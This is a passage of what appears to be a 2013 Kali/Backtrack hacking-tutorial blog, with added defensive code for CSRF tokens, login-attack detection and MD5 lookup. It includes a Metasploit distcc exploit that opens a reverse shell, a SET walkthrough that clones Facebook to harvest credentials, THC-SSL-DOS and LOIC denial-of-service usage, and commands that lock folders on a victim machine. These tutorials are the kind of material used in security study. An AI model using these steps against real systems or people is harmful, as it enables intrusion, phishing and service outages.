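    out["protected_hidden_form_post"] = transfer_protected(forged_request(sid, "POST"))
    wrong = forged_request(sid, "POST")
    wrong.params["csrf"] = csrf_token(sid, "change_email")   # a token harvested from another form
    out["protected_token_for_other_action"] = transfer_protected(wrong)
    out["balance_after_forgeries"] = SESSIONS[sid]["balance"]

    legit = Request("POST", {"session": sid},
                    {"acct": "BOB", "amount": "100", "csrf": csrf_token(sid, "transfer")})
    out["protected_legit_post"] = transfer_protected(legit)
    out["balance_after_legit"] = SESSIONS[sid]["balance"]
    return out


if __name__ == "__main__":
    for step, value in run_scenario().items():
        print(f"{step}: {value}")
```

The token is compared with compare_digest to avoid a timing side channel, and binding it to the action name means a token leaked from one form (say, through a less protected page) does not authorise a transfer. Rotating the token per request, the first control in the list, is the same code with a nonce stored in the session in place of the action name.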





Friday, 22 March 2013

HTTP SSL Certificate Information using Metasploit Auxiliary module


Parse the server SSL certificate to obtain the common name and signature algorithm

Rank: Normal

Authors



  • et < et [at] metasploit.com >

  • Chris John Riley < >

  • Veit Hailperin < hailperv [at] gmail.com >


msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ssl) > run

Source Code : http://adf.ly/LL7LN


 



Wednesday, 20 March 2013

How to install Zenmap in Kali Linux


Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

You can download Zenmap (often packaged with Nmap itself) from the Nmap download page. Zenmap is quite intuitive, but you can learn more about using it from the Zenmap User's Guide or check out the Zenmap man page for some quick reference information.

Offical Website - http://adf.ly/LEJ56




DistCC Daemon Command Execution


This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. The weakness is one of configuration: distccd should only be reachable from the build hosts, so restrict clients with its --allow option (and bind it to an internal address with --listen) or firewall its port (3632/tcp) rather than exposing it to the network.
Exploit rank: Excellent
CVSS score: 9.3

Commands :


msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit



Vulnerability Scanner uniscan.pl in Backtrack 5 R3


Uniscan is a vulnerability scanner for web applications, written in Perl for Linux environments. It was developed as a final-year project of the computer science course at the Federal University of Pampa and is licensed under the GNU General Public License 3.0 (GPL 3).

Features Of Uniscan:



  • Identification of system pages through a web crawler.

  • Use of threads in the crawler.

  • Control over the maximum number of requests the crawler makes.

  • Control of the variation of system pages identified by the web crawler.

  • Control of file extensions that are ignored.

  • Tests of pages found via the GET method.

  • Tests of forms found via the POST method.

  • Support for SSL requests (HTTPS).

  • Proxy support.

  • Generate a site list using Google.

  • Generate a site list using Bing.

  • Plug-in support for the crawler.

  • Plug-in support for dynamic tests.

  • Plug-in support for static tests.

  • Plug-in support for stress tests.

  • Multi-language support.

  • Web client.

  • GUI client written in Perl using Tk.


Usage:

perl ./uniscan.pl -u http://www.targetsite.com/ -qweds

perl ./uniscan.pl -f sites.txt -bqweds


perl ./uniscan.pl -i uniscan


perl ./uniscan.pl -i xxx.xxx.xxx.xxx


perl ./uniscan.pl -u https://www.targetsite.com/ -r




Tuesday, 19 March 2013

How to install ubuntu software center in Kali Linux


By default, Ubuntu Software Center is not installed in Kali Linux. If you want to install it, use this apt-get command:

apt-get install software-center




How to install gedit text editer in Kali Linux


By default, gedit is not installed in Kali Linux. If you want to install the gedit text editor in Kali Linux, use this apt-get command (the package is named gedit):

apt-get install gedit






Configure vpn in Kali Linux



By default, no VPN is configured in Kali Linux. If you want to connect to a VPN in Kali Linux, first install the PPTP and OpenVPN NetworkManager plugins using apt-get:

Commands :


apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart


Kali Linux forum : http://adf.ly/L6fmv


How to lock and unlock folder in remote victim pc using metasploit

Once you have a Meterpreter session, use the 'shell' command to get a command prompt on the target.

Lock and unlock a folder:

To lock the folder, type cacls <folder name> /e /p everyone:n and press Enter; this edits the folder's ACL to deny the Everyone group all access. To unlock it again, grant the access back with cacls <folder name> /e /p everyone:f.





Monday, 18 March 2013

How To Use Credential Harvester Attack Method Over Internet


The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.


Tools : SET TOOL KIT


OS : Backtrack 5

The credential harvester attack method is used when you don't want to specifically get a shell but want to perform phishing attacks in order to obtain usernames and passwords. In this attack vector, a website is cloned, and when the victim enters their user credentials, the usernames and passwords are posted back to your machine and the victim is redirected to the legitimate site.



Sunday, 17 March 2013

Windows Gather USB Drive History Metasploit Module


This module will enumerate USB Drive history on a target host.


Usage Information


msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options

SESSION: The session to run this module on.
VERBOSE: Enable detailed status messages.
WORKSPACE: Specify the workspace for this module.



The Hacker’s Choice Releases SSL DOS Tool


The German hacker group "The Hacker's Choice" has officially released a new DDoS tool. The tool exploits a weakness in SSL to kick a server off the Internet.

Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors have been aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure renegotiation feature to trigger thousands of renegotiations via a single TCP connection.

Download:

Windows binary: thc-ssl-dos-1.4-win-bin.zip
Unix source: thc-ssl-dos-1.4.tar.gz

Usage:
Use "./configure; make all install" to build, then run: ./thc-ssl-dos 127.3.133.7 443

Tips & tricks for whitehats:
1. The average server can do 300 handshakes per second. This would require 10-25% of your laptop's CPU.
2. Use multiple hosts (SSL-DOS) if an SSL accelerator is used.
3. Be smart in target acquisition: the HTTPS port (443) is not always the best choice. Other SSL-enabled ports are less likely to sit behind an SSL accelerator (POP3S, SMTPS, ... or the secure database port).

Countermeasures:
No real solution exists. The following steps can mitigate (but not solve) the problem:

1. Disable SSL renegotiation
2. Invest in an SSL accelerator

Of the two, the first is the one that matters in practice: refusing client-initiated renegotiation removes the amplification the tool relies on, leaving only the cost of fresh handshakes, which per-source connection and handshake rate limits can cap.

How to install Conky Lua in kali Linux


Conky Lua is a very nice gadget for every Linux user. It shows the usage of your system: CPU, disk, memory, network upload and download speed, and also the date and time. Many users wrote to me about this gadget; they like it so much. So now we will start. I customized this gadget in different flavors.


Install Conky in Ubuntu/Linux Mint open terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:


  • sudo apt-get install conky conky-all



Install by yourself in other distro's.


First of all Download Startup script with following commands:


  • wget -O .start-conky http://goo.gl/6RrEw

  • chmod +x .start-conky



Now open Startup Applications > click Add  > New Dialog box will open click on Browse > Now

To Install Green-Flavor open Terminal and enter following commands:


  • wget -O conky-green.zip http://goo.gl/WlDxp

  • unzip conky-green.zip && sudo rm conky-green.zip


 

 



How to install armitage in Kali Linux


The Kali Linux team added an Armitage package to its repository:
apt-get install armitage
  • Before you start Armitage, make sure the PostgreSQL database is running:
                              service postgresql start

  • If you get a missing database.yml error, start the Metasploit service, which creates the database configuration:
                              service metasploit start
VIDEO :

How to install vmware tools in kali linux

Kali Linux



How to install Kali Linux in vmware(VIDEO)




How to install Kali Linux in vmware

Kali Linux


Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.




Download Kali Linux - http://adf.ly/Kyb1o (this is an ad-shortener link; get the image from the official Kali site and check its published checksum before installing it)


How to install LOIC(Low Orbit Ion Cannon) in Backtrack 5 R3

Low Orbit Ion Cannon

LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.



1 - aptitude install git-core monodevelop


2 - Download the loic.sh script and make it executable: wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh && chmod +x loic.sh


3 - Make a folder - mkdir <folder name>


4 - Install - ./loic.sh install


5 - Update - ./loic.sh update


6 - Run LOIC - ./loic.sh run




Webapplication Attack : dos And ddos attacks[Video Demonstration]

ddos
What is a denial-of-service (DoS) attack?
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.

The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular website into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.

An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.

What is a distributed denial-of-service (DDoS) attack?
In a distributed denial-of-service (DDoS) attack, an attacker may use your computer to attack another computer. By taking advantage of security vulnerabilities or weaknesses, an attacker could take control of your computer. He or she could then force your computer to send huge amounts of data to a website or send spam to particular email addresses. The attack is "distributed" because the attacker is using multiple computers, including yours, to launch the denial-of-service attack.

dos and ddos attacks


Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

Why Are Applications Vulnerable?

  • Reasonable Use Expectations

  • Application Environment Bottlenecks

  • Implementation Flaws

  • Poor Data Validation


Web Server Resource Consumption Targets


  • CPU,Memory and Sockets

  • Disk Bandwidth

  • Database Bandwidth

  • Worker Processes


Web Services Unavailability

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them hard to detect with existing DoS protection measures.


Login Attacks

The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond.

User Registration DoS

The attacker could create a program that submits the registration form repeatedly, adding a large number of spurious users to the application.

Account Lock-OUT Attacks

The attacker may enumerate usernames through another vulnerability in the application and then attempt to authenticate to the site using valid usernames and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site. A hard lockout on failed attempts is therefore itself a DoS lever; throttling per source address or adding progressive delays limits the damage an attacker can do to other people's accounts.

User Enumeration

If the application states which part of the username/password pair is incorrect, an attacker can automate trying common usernames from a dictionary file to enumerate the users of the application. The same leak can show up as a different HTTP status, page length or response time for valid and invalid usernames even when the error text is uniform.
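The three login-related attacks above leave a characteristic trace in the authentication log, so here is an added example (my code, not part of the original post) of detecting them after the fact. It assumes a log line format of its own (`<timestamp> login user=<u> src=<ip> result=OK|FAIL reason=<r>`), a constructed sample log and illustrative thresholds. The enumeration check relies on the application logging why a login failed on the server side; that is fine and useful, the point of the section is only that the reason must not be told to the client.

```python
"""Added example: spot login floods, account-lockout attacks and user
enumeration in an authentication log. Log format and thresholds are
this example's own assumptions, not the page's."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log: one normal user, one lockout attacker (valid
# usernames, wrong passwords, three accounts in nine seconds) and one
# enumeration attacker (guessing names that do not exist).
SAMPLE_LOG = """
2013-03-20T10:00:00 login user=alice src=198.51.100.7 result=OK
2013-03-20T10:00:05 login user=bob src=198.51.100.7 result=FAIL reason=bad_password
2013-03-20T10:00:06 login user=bob src=198.51.100.7 result=OK
2013-03-20T10:01:00 login user=alice src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:01 login user=alice src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:02 login user=alice src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:03 login user=bob src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:04 login user=bob src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:05 login user=bob src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:06 login user=carol src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:07 login user=carol src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:01:08 login user=carol src=203.0.113.9 result=FAIL reason=bad_password
2013-03-20T10:05:00 login user=admin src=203.0.113.44 result=FAIL reason=unknown_user
2013-03-20T10:05:01 login user=root src=203.0.113.44 result=FAIL reason=unknown_user
2013-03-20T10:05:02 login user=test src=203.0.113.44 result=FAIL reason=unknown_user
2013-03-20T10:05:03 login user=guest src=203.0.113.44 result=FAIL reason=unknown_user
2013-03-20T10:05:04 login user=dave src=203.0.113.44 result=FAIL reason=unknown_user
""".strip().splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+) login user=(?P<user>\S+) src=(?P<src>\S+) "
    r"result=(?P<result>OK|FAIL)(?: reason=(?P<reason>\S+))?$"
)


def parse_log(lines):
    """Parse matching lines into dicts with a datetime 'ts'; skip the rest."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%S")
            events.append(ev)
    return events


def burst(timestamps, window_s, threshold):
    """True if at least `threshold` timestamps fall inside some window_s span."""
    ts = sorted(timestamps)
    lo = 0
    for hi in range(len(ts)):
        while (ts[hi] - ts[lo]).total_seconds() > window_s:
            lo += 1
        if hi - lo + 1 >= threshold:
            return True
    return False


def analyze(events, window_s=60, lockout_failures=6, lockout_users=3,
            enum_users=5, flood_attempts=8, flood_window_s=10):
    """Return {'flood': [...], 'lockout': [...], 'enumeration': [...]}, each a
    sorted list of source addresses whose behaviour matched that pattern."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    report = {"flood": [], "lockout": [], "enumeration": []}
    for src, evs in sorted(by_src.items()):
        # Login flood: many attempts, whatever the outcome, in a short window.
        if burst([e["ts"] for e in evs], flood_window_s, flood_attempts):
            report["flood"].append(src)
        # Lockout attack: wrong passwords spread over several valid accounts.
        bad_pw = [e for e in evs if e["result"] == "FAIL" and e["reason"] == "bad_password"]
        if (len({e["user"] for e in bad_pw}) >= lockout_users
                and burst([e["ts"] for e in bad_pw], window_s, lockout_failures)):
            report["lockout"].append(src)
        # Enumeration: many distinct non-existent names from one source.
        unknown = [e for e in evs if e["result"] == "FAIL" and e["reason"] == "unknown_user"]
        if (len({e["user"] for e in unknown}) >= enum_users
                and burst([e["ts"] for e in unknown], window_s, enum_users)):
            report["enumeration"].append(src)
    return report


def analyze_sample():
    """Run the detector over the constructed sample log."""
    return analyze(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for kind, sources in analyze_sample().items():
        print("%-12s %s" % (kind, ", ".join(sources) or "-"))
```

On the sample, 203.0.113.9 trips both the flood and the lockout check (nine failures across alice, bob and carol in nine seconds), while 203.0.113.44 trips only the enumeration check; the legitimate user at 198.51.100.7, who mistyped once, trips nothing.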



How do you know if an attack is happening?

Not all disruptions to service are the result of a denial-of-service attack. There may be technical problems with a particular network, or system administrators may be performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:


  •     unusually slow network performance (opening files or accessing websites)

  •     unavailability of a particular website

  •     inability to access any website

  •    dramatic increase in the amount of spam you receive in your account


How do you avoid being part of the problem?

Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:


  •     Install and maintain anti-virus software (see Understanding Anti-Virus Software for more information).

  •     Install a firewall, and configure it to restrict traffic coming into and leaving your computer (see Understanding Firewalls for more information).

  •     Follow good security practices for distributing your email address (see Reducing Spam for more information). Applying email filters may help you manage unwanted traffic.





Saturday, 16 March 2013

How to share folder in Backtrack 5 R3 to make accessible in Windows

apache2

1. Open your terminal (CTRL+ALT+T) and run this command to create a new directory "share":

mkdir /var/www/share 

2. Change the mode of the share folder to 755:

chmod -R 755 /var/www/share/ 


3. Change the ownership of that folder to www-data:

chown -R www-data:www-data /var/www/share/

4. Everything is set up correctly up to this step. Next, start the Apache server with the service apache2 start command:

root@bt:~# service apache2 start 
* Starting web server apache2

If you don't have apache2 installed, run
apt-get install apache2

Windows machines can then open http://<IP of the BackTrack box>/share/ in a browser. Apache serves this folder to every host that can reach port 80 with no authentication, so only put files there that you are happy to hand to anyone on the network, and stop apache2 when you are done.


Web Jacking Attack

Web Jacking Attack Method

 

The Web Jacking Attack Vector is another phishing technique that can be used in social engineering engagements. Attackers using this method create a fake website; when the victim opens the link, a page appears with the message that the website has moved and they need to click another link. If the victim clicks that link, which looks real, he is redirected to the fake page.


The Social-Engineer Toolkit already includes this attack, so we are going to use SET to implement it. We open SET and select option 2, Website Attack Vectors.

We will see a list of the available web attack methods. The attack we are going to use is of course the Web Jacking Attack, so we select option 6.

In the next menu we have 3 options:

  •     Web Templates

  •     Site Cloner

  •     Custom Import




We will select the site cloner in order to clone the website of our interest. Remember that this type of attack works with the credential harvester method, so we need to choose a website that has username and password fields for the attack to succeed. For this scenario, as you can see in the image below, we have chosen to clone Facebook because of its popularity.


Now it is time to send the link with our IP address to the victim. Let's see what the victim sees when opening the link.


As you can see, a message appears informing the user that the website has moved to a new location. The link in the message looks valid, so an unsuspecting user will click on it. At that point a new page loads in the victim's browser; it is fake and is running on our web server.


If the victim enters his credentials into the fake Facebook page that looks like the real one, we are able to capture his username and password. The next image shows that:




How to Use Tor in Backtrack 5 R3 Whole System Using Proxychains

tor_sticker
Proxychains is open source software for GNU/Linux systems.

proxychains is a tool that forces any TCP connection made by a given application to go through a proxy such as Tor, or any other SOCKS4, SOCKS5 or HTTP(S) proxy.

It works by preloading a library into the application, so only TCP connections made through the C library are proxied: raw-socket tools (for example nmap SYN scans) and UDP traffic bypass it, and DNS lookups leak unless proxy_dns is enabled in proxychains.conf. "Whole system" therefore means every program you start under proxychains, not every packet the box sends.



How to install Tor and Polipo in Backtrack 5 R3





How to Use Tor in Backtrack 5 R3 Whole System Using Proxychains

How To install Tor in Backtrack 5 R3

tor_sticker
Tor is an open source anonymity tool for the Internet. It protects your personal identity from tracking systems by changing the apparent source IP address frequently; the application builds many virtual tunnels through the Tor network. By default Tor is not integrated into BackTrack 5. Why use Tor on BackTrack? Normally Tor is used to protect browsing, but it can also be used with network scanning tools and other information gathering tools, or by students for educational purposes. In this article I will show you how to install Tor properly on BackTrack. Don't hesitate if you are unable to follow this post: put your question to me and I will answer quickly.




So Let Us Start
I do not recommend relying on Tor alone as your proxy. It's wise to layer your anonymity (including your router, if you're working off a desktop).

start. Open the Terminal.
step 1. cd /etc/apt
ls

step 2. vi sources.list
step 3. Press 'i' on your keyboard.
step 4. Add this line at the bottom:  deb http://deb.torproject.org/torproject.org lucid main
step 5. Press ESC, type a colon, type wq and hit enter.
step 6. Run this command: gpg --keyserver keys.gnupg.net --recv 886DDD89
step 7. Run this command: gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
(The short ID in step 6 only fetches a key; the full fingerprint in step 7 is what pins it. Check that fingerprint against the one published on torproject.org before adding the key.)
step 8. apt-get update
step 9. apt-get install tor tor-geoipdb
step 10. Download the Tor Browser Bundle for Linux (to your desktop): https://www.torproject.org/projects/torbrowser.html.en

step 11. cd Desktop
step 12. Extract the archive you downloaded for your architecture (the i686 archive is shown; use the x86_64 archive name if that is what you downloaded):

tar -xvzf tor-browser-gnu-linux-i686-2.2.37-2-dev-en-US.tar.gz

step 13. chown -R root:root ./tor-browser_en-US
step 14. Open the folder 'tor-browser_en-US'.
step 15. Open the file 'start-tor-browser' in gedit.
step 16. Find the lines:

if [ "`id -u`" -eq 0 ]; then
    complain "The Tor Browser Bundle should not be run as root.  Exiting."
    exit 1
fi

17. Change them to:

if [ "`id -u`" -eq 1 ]; then
    complain "The Tor Browser Bundle should not be run as root.  Exiting."
    exit 1
fi

This only disables the script's refusal to run as root (BackTrack's default user). Everything the browser does then runs with root privileges, so a browser exploit hands an attacker the whole box; on any system with a non-root account, run the bundle as that user instead of patching the check.

now install polipo


18. apt-get install polipo
19. cd /etc/polipo
20. mv config conf-backup.txt
21. Download and copy polipo config
22. vi config
23. Press 'i' on your keyboard.
24. Paste the text you just copied.
25. Press ESC, type a colon, type wq and hit enter.
26. service polipo start
27. service tor start
28. Start tor browser bundle (From the file on your desktop).
To run the Tor Browser Bundle, execute the start-tor-browser script:
# ./start-tor-browser

Remember, polipo runs on port 8118, TOR runs on 9050

Be sure to stop both when you need to update anything:

By giving Command Like

1. service tor stop
2. service polipo stop

VIDEO TUTORIAL :


PyInjector Shellcode Injection

injecter

A while back Bernardo Damele showed a neat method for using an executable to deliver alphanumeric shellcode straight into memory. This was a great attack vector and allowed AV and other security mechanisms such as HIPS to be circumvented extremely easily. You can download shellcodeexec here. Since then, Matthew Graeber came out with a technique for injecting shellcode straight into memory through PowerShell. This technique eventually made it into the Social-Engineer Toolkit (SET) as a method for the Java Applet attack that never touches disk. You can read the blog post here.




The Social-Engineer Toolkit (SET) v4.7 released

SET-update

The Social-Engineer Toolkit (SET) version 4.7 codename “Headshot” has been released. This version of SET introduces the ability to specify multi-powershell injection which allows you to specify as many ports as you want and SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What’s nice with this technique is it never touches disk and also uses already white listed processes. So it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to multi-powershell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information within different modules.
Change log for version 4.7




  • removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided

  • began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk

  • moved all port.options to the central routine file set.options

  • moved all ipaddr.file to the central routine file set.options

  • changed spacing on when launching the SET web server

  • changed the wording to reflect what operating systems this was tested on versus browsers

  • removed an un-needed print option1 within smtp_web that was reflecting a message back to user

  • added the updated java bean jmx exploit that was updated in Metasploit

  • added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it

  • added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound.

  • enabled multi-pyinjection through java applet attack vector, it is configured through set config

  • removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same

  • fixed a bug that would cause linux and osx payloads to be selected even when disabled

  • fixed a bug that would cause the meta_config file to be empty if selecting powershell injection

  • added automatic check for Kali Linux to detect the default moved Metasploit path

  • removed a tail comma from the new multi injector which was causing it to error out

  • added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates)

  • added new check to remove duplicates into multi powershell injection

  • made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now

  • added encrypted and obfuscated jar files to SET, will automatically push new repos to git everyday.

  • rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet.

  • added signed and unsigned jar files to the java applet attack vector

  • removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk

  • fixed a payload duplication issue in create_payload.py, will now check to see if port is there

  • removed a pefile check unless backdoored executable is in use

  • turned digital signature stealing from a pefile to off in the set_config file

  • converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly





It can also be downloaded through github using the following command: 
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/


How to install Synaptic Package Manager in Ubuntu 12.04.2

Synaptic Package Manager

Synaptic is a graphical package management program for apt. It provides the same features as the apt-get command line utility with a GUI front-end based on Gtk+.



sudo apt-get install synaptic



Friday, 15 March 2013

How to install CopyQ (Advanced Clipboard Manager) in Ubuntu 12.04.2

How to install CopyQ

CopyQ is an advanced clipboard manager with a searchable and editable history, support for image formats, command-line control and more. Both the command interface and the graphical interface are accessible from the tray. By default the application stores any new clipboard content in the list in the first tab.


sudo add-apt-repository ppa:samrog131/ppa
sudo apt-get update
sudo apt-get install copyq


How to install Nuvola Player 1.0.5 in Ubuntu 12.04.2

Nuvola Player

Nuvola Player runs web interface of cloud music service in its own window and provides integration with a Linux desktop (system tray, Ubuntu sound menu, dock menu and notifications). Currently supported services are Google Play, Grooveshark, Hype Machine, 8tracks and other.



sudo add-apt-repository ppa:nuvola-player-builders/stable
sudo apt-get update
sudo apt-get install nuvolaplayer


How to install Kazam Screen Caster in Ubuntu

install Kazam 1.4 Screen Caster in Ubuntu

Kazam is a simple screen recording program that will capture the content of your screen and record a video file that can be played by any video player that supports VP8/Mp4/WebM video format. It also records audio from any sound input device that is supported and visible by Pulse-audio.

Commands :
sudo add-apt-repository ppa:kazam-team/stable-series
sudo apt-get update
sudo apt-get install kazam


MD5 Encryption and Decryption Python Script




Click Here to Download Python Script
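The script itself is only available through the download link above, so here is an added example of what such a script can and cannot do (my code, not the downloaded one). MD5 is a one-way hash, not a cipher: there is no key and nothing to decrypt. "Decrypting" an MD5 value means hashing candidate strings until one matches, which is why it only works for values that were in your wordlist to begin with. The wordlist below is constructed for the example; in practice you would feed it a crunch output or a leaked-password list, and the salted variant shows why a lookup built from unsalted digests stops working as soon as the application salts its hashes.

```python
"""Added example: MD5 is a hash, so 'decryption' is a dictionary lookup."""
import hashlib

# Constructed wordlist for the example; in practice use a real wordlist.
WORDLIST = ["123456", "password", "letmein", "qwerty", "backtrack5"]


def md5_hex(text):
    """Hex MD5 digest of a string."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_lookup(wordlist):
    """Precompute digest -> word so many hashes can be reversed in one pass."""
    return {md5_hex(word): word for word in wordlist}


def reverse_md5(digest, wordlist=WORDLIST):
    """Return the word whose MD5 equals digest, or None if it is not in the list."""
    return build_lookup(wordlist).get(digest.strip().lower())


def salted_md5_hex(text, salt):
    """MD5 over salt||text: the same password gives a different digest per
    salt, so a lookup table built from unsalted digests no longer matches."""
    return hashlib.md5((salt + text).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    plain = md5_hex("password")
    print(plain, "->", reverse_md5(plain))
    salted = salted_md5_hex("password", "x9")
    print(salted, "->", reverse_md5(salted))
```

Running it prints the recovered word for the unsalted digest and None for the salted one, even though both were made from the same password.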